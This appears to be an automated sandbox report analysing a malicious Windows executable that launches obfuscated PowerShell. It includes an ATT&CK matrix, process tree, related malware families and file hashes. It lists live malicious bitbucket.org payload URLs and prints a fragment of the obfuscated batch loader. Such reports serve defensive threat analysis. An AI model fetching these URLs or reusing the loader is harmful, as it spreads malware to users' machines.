        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\System32\CatRoot\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\Microsoft-Windows-Client-Features-Package0313~31bf3856ad364e35~amd64~~10.0.19041.1949.cat VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Data\v4.0_4.0.0.0__b77a5c561934e089\System.Data.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\Windows\Microsoft.NET\assembly\GAC_64\System.Transactions\v4.0_4.0.0.0__b77a5c561934e089\System.Transactions.dll VolumeInformation
        Source: C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe Queries volume information: C:\ VolumeInformation
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD218BF4 GetSystemTimeAsFileTime,GetCurrentProcessId,GetCurrentThreadId,GetTickCount,GetTickCount,QueryPerformanceCounter,0_2_00007FF6FD218BF4
        Source: C:\Users\user\Desktop\nTHivMbGpg.exe Code function: 0_2_00007FF6FD212D70 GetVersion,GetModuleHandleW,GetProcAddress,ExitWindowsEx,CloseHandle,0_2_00007FF6FD212D70
        MITRE ATT&CK Matrix (a leading number is the count of matched signatures for that technique; the remaining entries are the matrix's technique placeholders)

        • Reconnaissance: Gather Victim Identity Information; Credentials; Email Addresses; Employee Names; Gather Victim Network Information; Domain Properties; DNS; Network Trust Dependencies
        • Resource Development: 1 Scripting; Domains; DNS Server; Virtual Private Server; Server; Botnet; Web Services; Serverless
        • Initial Access: Valid Accounts; Default Accounts; Domain Accounts; Local Accounts; Cloud Accounts; Replication Through Removable Media; External Remote Services; Drive-by Compromise
        • Execution: 2 Native API; 2 Command and Scripting Interpreter; 2 PowerShell; Cron; Launchd; Scheduled Task; Systemd Timers; Container Orchestration Job
        • Persistence: 1 Scripting; 1 DLL Side-Loading; 1 Registry Run Keys / Startup Folder; Login Hook; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        • Privilege Escalation: 1 DLL Side-Loading; 1 Access Token Manipulation; 11 Process Injection; 1 Registry Run Keys / Startup Folder; Network Logon Script; RC Scripts; Startup Items; Scheduled Task/Job
        • Defense Evasion: 1 Obfuscated Files or Information; 1 Software Packing; 1 Timestomp; 1 DLL Side-Loading; 21 Virtualization/Sandbox Evasion; 1 Access Token Manipulation; 11 Process Injection; 1 Rundll32
        • Credential Access: OS Credential Dumping; LSASS Memory; Security Account Manager; NTDS; LSA Secrets; Cached Domain Credentials; DCSync; Proc Filesystem
        • Discovery: 1 System Time Discovery; 1 File and Directory Discovery; 15 System Information Discovery; 1 Security Software Discovery; 1 Process Discovery; 21 Virtualization/Sandbox Evasion; 1 Application Window Discovery; System Owner/User Discovery
        • Lateral Movement: Remote Services; Remote Desktop Protocol; SMB/Windows Admin Shares; Distributed Component Object Model; SSH; VNC; Windows Remote Management; Cloud Services
        • Collection: 1 Archive Collected Data; Data from Removable Media; Data from Network Shared Drive; Input Capture; Keylogging; GUI Input Capture; Web Portal Capture; Credential API Hooking
        • Command and Control: 3 Ingress Tool Transfer; 21 Encrypted Channel; 3 Non-Application Layer Protocol; 4 Application Layer Protocol; Fallback Channels; Multiband Communication; Commonly Used Port; Application Layer Protocol
        • Exfiltration: Exfiltration Over Other Network Medium; Exfiltration Over Bluetooth; Automated Exfiltration; Traffic Duplication; Scheduled Transfer; Data Transfer Size Limits; Exfiltration Over C2 Channel; Exfiltration Over Alternative Protocol
        • Impact: 1 System Shutdown/Reboot; Network Denial of Service; Data Encrypted for Impact; Data Destruction; Data Encrypted for Impact; Service Stop; Inhibit System Recovery; Defacement
Behavior Graph ID: 1524410 | Sample: nTHivMbGpg.exe | Startdate: 02/10/2024 | Architecture: WINDOWS | Score: 100

Start (node 2):
• DNS/IP: bitbucket.org
• Signatures: Malicious sample detected (through community Yara rule); Antivirus / Scanner detection for submitted sample; Multi AV Scanner detection for submitted file; 7 other signatures
• Started: nTHivMbGpg.exe 1 3 (node 9); rundll32.exe (node 11)

nTHivMbGpg.exe (node 9):
• Started: cmd.exe 1 (node 13)

cmd.exe (node 13):
• Signatures: Suspicious powershell command line found; Bypasses PowerShell execution policy
• Started: powershell.exe 7 (node 16); conhost.exe (node 19)

powershell.exe (node 16):
• Signatures: Suspicious powershell command line found; Found suspicious powershell code related to unpacking or dynamic code loading
• Started: powershell.exe 14 15 (node 21)

powershell.exe (node 21):
• DNS/IP: bitbucket.org 185.166.143.50, 443, 49699, 49700 AMAZON-02US Germany

Source | Detection | Scanner | Label
nTHivMbGpg.exe | 39% | ReversingLabs | Win64.Trojan.Generic
nTHivMbGpg.exe | 100% | Avira | TR/Agent.blxmm
        No Antivirus matches
        No Antivirus matches
        No Antivirus matches
Source | Detection | Scanner | Label
http://crl.microsoft | 0% | URL Reputation | safe
https://contoso.com/License | 0% | URL Reputation | safe
https://contoso.com/ | 0% | URL Reputation | safe
https://nuget.org/nuget.exe | 0% | URL Reputation | safe
https://oneget.orgX | 0% | URL Reputation | safe
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | 0% | URL Reputation | safe
http://nuget.org/NuGet.exe | 0% | URL Reputation | safe
http://pesterbdd.com/images/Pester.png | 0% | URL Reputation | safe
https://go.micro | 0% | URL Reputation | safe
https://contoso.com/Icon | 0% | URL Reputation | safe
https://aka.ms/pscore68 | 0% | URL Reputation | safe
https://oneget.org | 0% | URL Reputation | safe
Name | IP | Active | Malicious | Antivirus Detection | Reputation
bitbucket.org | 185.166.143.50 | true | true | | unknown
Name | Malicious | Antivirus Detection | Reputation
https://bitbucket.org/hgdfhdfgd/test/downloads/new_image.jpg?14441723 | true | | unknown
https://bitbucket.org/hgdfhdfgd/test/downloads/new_image2.jpg?14461721 | true | | unknown
Name | Source | Malicious | Antivirus Detection | Reputation
http://crl.microsoft | powershell.exe, 00000004.00000002.1303077522.0000017DBB3E5000.00000004.00000020.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://admin.atlassian.com | powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/License | powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/ | powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bitbucket.org/blog/announcing-our-new-ci-cd-runtime-with-up-to-8x-faster-builds | powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://api.bitbucket.org | powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/ | powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpac | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://preferences.atlassian.com | powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpack | powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://www.atlassian.com/try/cloud/signup?bundle=bitbucket | powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://remote-app-switcher.prod-east.frontend.public.atl-paas.net | powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bitbucket.status.atlassian.com/ | powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/ | powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://nuget.org/nuget.exe | powershell.exe, 00000005.00000002.1290480289.00000271417A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027133078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ap | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ve | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/dist/webpacp | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://oneget.orgX | powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://id.atlassian.com/profile/rest/profile&quot; | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aui-cdn.atlassian.com/ | powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bitbucket.org/gateway/api/emoji/ | powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bqlf8qjztdtr.statuspage.io | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://schemas.xmlsoap.org/ws/2005/05/identity/claims/name | powershell.exe, 00000004.00000002.1303662906.0000017DBCDD4000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.00000271315F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://bitbucket.org | powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | true | | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/css/entry/ad | powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/logos/bi | powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://nuget.org/NuGet.exe | powershell.exe, 00000005.00000002.1290480289.00000271417A2000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027133078000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
http://www.apache.org/licenses/LICENSE-2.0 | powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://id.atlassian.com/login | powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://pesterbdd.com/images/Pester.png | powershell.exe, 00000005.00000002.1273855820.0000027132F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://bitbucket.org/blog/wp-json/wp/v2/posts?categories=196&context=embed&per_page=6&orderby=date& | powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://www.apache.org/licenses/LICENSE-2.0.html | powershell.exe, 00000005.00000002.1273855820.0000027132F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://go.micro | powershell.exe, 00000005.00000002.1273855820.0000027132225000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://id.atlassian.com/logout | powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
http://bitbucket.org | powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://web-security-reports.services.atlassian.com/csp-report/bb-website | powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/jsi18n/en/dj | powershell.exe, 00000005.00000002.1273855820.0000027132CE5000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://contoso.com/Icon | powershell.exe, 00000005.00000002.1290480289.0000027141660000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://dz8aopenkvv6s.cloudfront.net | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://github.com/Pester/Pester | powershell.exe, 00000005.00000002.1273855820.0000027132F01000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://id.atlassian.com/manage-profile/ | powershell.exe, 00000005.00000002.1273855820.0000027132CE9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://id.atlassian.com/login?prompt=login&amp;continue=https%3A%2F%2Fbitbucket.org%2Fhgdfhdfgd%2Ft | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/ | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://cdn.cookielaw.org/ | powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.prod.public.atl-paas.net/3ff600212c86/img/default_ | powershell.exe, 00000005.00000002.1273855820.0000027132D64000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.0000027132CED000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://bbc-object-storage--frontbucket.us-east-1.staging.public.atl-paas.net/; | powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://remote-app-switcher.stg-east.frontend.public.atl-paas.net | powershell.exe, 00000005.00000002.1273855820.0000027132CC9000.00000004.00000800.00020000.00000000.sdmp | false | | unknown
https://aka.ms/pscore68 | powershell.exe, 00000004.00000002.1303662906.0000017DBCD5D000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000004.00000002.1303662906.0000017DBCDAA000.00000004.00000800.00020000.00000000.sdmp, powershell.exe, 00000005.00000002.1273855820.00000271315F1000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
https://oneget.org | powershell.exe, 00000005.00000002.1273855820.0000027132DAE000.00000004.00000800.00020000.00000000.sdmp | false | URL Reputation: safe | unknown
                                                                                          • No. of IPs < 25%
                                                                                          • 25% < No. of IPs < 50%
                                                                                          • 50% < No. of IPs < 75%
                                                                                          • 75% < No. of IPs
IP | Domain | Country | Flag | ASN | ASN Name | Malicious
185.166.143.50 | bitbucket.org | Germany | | 16509 | AMAZON-02US | true
                                                                                          Joe Sandbox version:41.0.0 Charoite
                                                                                          Analysis ID:1524410
                                                                                          Start date and time:2024-10-02 19:01:48 +02:00
                                                                                          Joe Sandbox product:CloudBasic
                                                                                          Overall analysis duration:0h 4m 38s
                                                                                          Hypervisor based Inspection enabled:false
                                                                                          Report type:full
                                                                                          Cookbook file name:default.jbs
                                                                                          Analysis system description:Windows 10 x64 22H2 with Office Professional Plus 2019, Chrome 117, Firefox 118, Adobe Reader DC 23, Java 8 Update 381, 7zip 23.01
                                                                                          Number of analysed new started processes analysed:18
                                                                                          Number of new started drivers analysed:0
                                                                                          Number of existing processes analysed:0
                                                                                          Number of existing drivers analysed:0
                                                                                          Number of injected processes analysed:0
                                                                                          Technologies:
                                                                                          • HCA enabled
                                                                                          • EGA enabled
                                                                                          • AMSI enabled
                                                                                          Analysis Mode:default
                                                                                          Analysis stop reason:Timeout
                                                                                          Sample name:nTHivMbGpg.exe
                                                                                          renamed because original name is a hash value
                                                                                          Original Sample Name:e60cc4cdd031cca383ae7d7449eda37dd72d4ef864816d452a7df72a9d019337.exe
                                                                                          Detection:MAL
                                                                                          Classification:mal100.spre.evad.winEXE@9/6@1/1
                                                                                          EGA Information:
                                                                                          • Successful, ratio: 33.3%
                                                                                          HCA Information:
                                                                                          • Successful, ratio: 100%
                                                                                          • Number of executed functions: 29
                                                                                          • Number of non-executed functions: 36
                                                                                          Cookbook Comments:
                                                                                          • Found application associated with file extension: .exe
                                                                                          • Exclude process from analysis (whitelisted): MpCmdRun.exe, dllhost.exe, SIHClient.exe, SgrmBroker.exe, conhost.exe, svchost.exe
                                                                                          • Excluded domains from analysis (whitelisted): slscr.update.microsoft.com, ctldl.windowsupdate.com, time.windows.com, dns.msftncsi.com, fe3cr.delivery.mp.microsoft.com
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 2412 because it is empty
                                                                                          • Execution Graph export aborted for target powershell.exe, PID 3724 because it is empty
• Not all processes were analyzed, report is missing behavior information
                                                                                          • Report size getting too big, too many NtSetInformationFile calls found.
                                                                                          • VT rate limit hit for: nTHivMbGpg.exe
Time | Type | Description
13:02:40 | API Interceptor | 29x Sleep call for process: powershell.exe modified
Match | Associated Sample Name / URL | Detection | Threat Name
185.166.143.50 | http://jasonj002.bitbucket.io/ | malicious | HTMLPhisher
| sostener.vbs | malicious | Njrat
| S0FTWARE.exe | malicious | Go Injector, Vidar, Xmrig
| SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer
| file.exe | malicious | LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig
| HelperLibrary.ps1 | malicious | Unknown
| SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser
| RedEngine.exe | malicious | Babadeda, RedLine
| Ad#U043ebe_Activator.exe | malicious | LummaC
| Notificacon Documneto.vbs | malicious | Unknown
Match | Associated Sample Name / URL | Detection | Threat Name | Context
bitbucket.org | sRMytgfRpJ.exe | malicious | RedLine | 185.166.143.49
| envifa.vbs | malicious | Unknown | 185.166.143.48
| sostener.vbs | malicious | Njrat | 185.166.143.50
| S0FTWARE.exe | malicious | Go Injector, Vidar, Xmrig | 185.166.143.50
| SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer | 185.166.143.48
| SecuriteInfo.com.Win32.CrypterX-gen.27124.19662.exe | malicious | Amadey, Clipboard Hijacker, Cryptbot, Go Injector, LummaC Stealer, PrivateLoader, PureLog Stealer | 185.166.143.50
| file.exe | malicious | LummaC, PureLog Stealer, RedLine, Socks5Systemz, Stealc, Vidar, Xmrig | 185.166.143.50
| https://www.getcoloringpages.com/coloring/359 | malicious | Unknown | 185.166.143.48
| HelperLibrary.ps1 | malicious | Unknown | 185.166.143.50
| SX8OLQP63C.exe | malicious | VjW0rm, AsyncRAT, RATDispenser | 185.166.143.50
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
AMAZON-02US | main_ppc.elf | Get hash | malicious | Mirai | Browse | 34.249.145.219
 | yakov.arm.elf | Get hash | malicious | Mirai | Browse | 18.191.162.167
 | yakov.arm7.elf | Get hash | malicious | Mirai | Browse | 108.128.211.34
 | novo.arm5.elf | Get hash | malicious | Moobot | Browse | 54.171.230.55
 | novo.arm64.elf | Get hash | malicious | Mirai, Moobot | Browse | 54.218.85.75
 | novo.arm7.elf | Get hash | malicious | Mirai, Moobot | Browse | 108.156.207.191
 | novo.ppc.elf | Get hash | malicious | Mirai, Moobot | Browse | 54.124.163.228
 | novo.ppc440fp.elf | Get hash | malicious | Mirai, Moobot | Browse | 54.184.182.174
 | novo.sh4.elf | Get hash | malicious | Mirai, Moobot | Browse | 13.242.57.236
 | novo.spc.elf | Get hash | malicious | Mirai, Moobot | Browse | 34.216.203.110
Match | Associated Sample Name / URL | SHA 256 | Detection | Threat Name | Link | Context
3b5074b1b5d032e5620f69f9f700ff0e | file.exe | Get hash | malicious | Unknown | Browse | 185.166.143.50
 | file.exe | Get hash | malicious | Credential Flusher | Browse | 185.166.143.50
 | PO-A1702108.exe | Get hash | malicious | AgentTesla, PureLog Stealer | Browse | 185.166.143.50
 | file.exe | Get hash | malicious | Credential Flusher | Browse | 185.166.143.50
 | QUOTATION_OCTQTRA071244PDF.scr.exe | Get hash | malicious | Unknown | Browse | 185.166.143.50
 | QUOTATION_OCTQTRA071244PDF.scr.exe | Get hash | malicious | Unknown | Browse | 185.166.143.50
 | file.exe | Get hash | malicious | Credential Flusher | Browse | 185.166.143.50
 | inquiry_qoutation_Europe_Hydraulic Partner, LLC_7638628279_uue.exe | Get hash | malicious | AgentTesla | Browse | 185.166.143.50
 | doc_20241002_383767466374663543.exe | Get hash | malicious | Snake Keylogger, VIP Keylogger | Browse | 185.166.143.50
 | All#att098764576.exe | Get hash | malicious | Snake Keylogger | Browse | 185.166.143.50

No context
Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:data
Category:dropped
Size (bytes):64
Entropy (8bit):0.773832331134527
Encrypted:false
SSDEEP:3:NlllulM/l:NllUE
MD5:805C8FFF87C479813887899456C786A0
SHA1:AEAC181AD6F9ABD8F565AFEEDF2F88D9863EE26E
SHA-256:978C1203394A1C538B848F3599CE68FC0347FD3471CFDC729D42E74E2EA90F3F
SHA-512:CDC6EA80327D036E56B3ACE44729334322F8B525A8765B6598802298AEBC945BA1D867F7DA168EC5B0D3C35F7AACD96B62549E667780814A3C9069E53D74DC88
Malicious:false
Reputation:low
Preview:@...e.................................|.n.......................

Process:C:\Users\user\Desktop\nTHivMbGpg.exe
File Type:DOS batch file, Unicode text, UTF-8 text, with very long lines (720), with CRLF line terminators
Category:modified
Size (bytes):12967
Entropy (8bit):5.5888603662154415
Encrypted:false
SSDEEP:192:D+KQ7X37nOHi+Gdv8ha/Z+qxnsmlNDz5Iy3dJE/4kS9ivGpI+7f8n:D+Zz37nf+GdvGa/ZImlNDzWyY/QIaEn
MD5:AD09A81FEE793CFF35B99C9512BE34C2
SHA1:08F34987BDED74057E939D96F2F64BBBD1EC61F0
SHA-256:618E7CC67994244C2AB0A8480B59066631AD0C8CD07764B5B6D4F79B2358325F
SHA-512:A41741C1BDEA39F05C5BB8DAE3B55ECDC94F5D8F7E1348485E080410AB02571384049C63FF8F17354803606B4F0AA88A7EBA7CF8B1590E3203E3BC82BD3A815C
Malicious:false
Reputation:low
Preview:@echo off..GOTO ............:............SET ..........=#DE#Mg#N##o#I##g#C##I##g#C##I##g#C##I##g#C##ZgB1#G4#YwB0#Gk#bwBu#C##R#Bv#Hc#b..GOTO ............:............SET ..........=G8#dwBu#Gw#bwBh#GQ#cw#v#G4#ZQB3#F8#aQBt#GE#ZwBl#C4#agBw#Gc#Pw#x#DQ#N##0#DE#Nw#..GOTO ..........2..:............SET ..........=#F0#XQ#g#Cg#JwB0#Hg#d##u#H##bgBn#FM#bwBl#G0#LwBz#GQ#YQBv#Gw#bgB3#G8#Z##v#HI#..GOTO ............:............SET ..........=HQ#c#Bv#Hc#ZQBy#HM#a#Bl#Gw#b##u#Eg#bwBt#GU#Jw#p#Ds#DQ#K#C##I##g#C##I##g#C##..GOTO ............:..........0..SET ..........=+#Cc#Ow#g#CQ#ZQBu#GQ#RgBs#GE#Zw#g#D0#I##n#Dw#P#BC#EE#UwBF#DY#N#Bf#EU#TgBE..GOTO ..........1..:............SE

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Reputation:high, very likely benign file
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
SHA-256:96AD1146EB96877EAB5942AE0736B82D8B5E2039A80D3D6932665C1A4C87DCF7
SHA-512:5B592E58F26C264604F98F6AA12860758CE606D1C63220736CF0C779E4E18E3CEC8706930A16C38B20161754D1017D1657D35258E58CA22B18F5B232880DEC82
Malicious:false
Preview:# PowerShell test file to determine AppLocker lockdown mode

Process:C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
File Type:ASCII text, with no line terminators
Category:dropped
Size (bytes):60
Entropy (8bit):4.038920595031593
Encrypted:false
SSDEEP:3:Si2NPqzAYMLAKVpKGOyzKtFS:SnqbKAKWGX
MD5:D17FE0A3F47BE24A6453E9EF58C94641
SHA1:6AB83620379FC69F80C0242105DDFFD7D98D5D9D
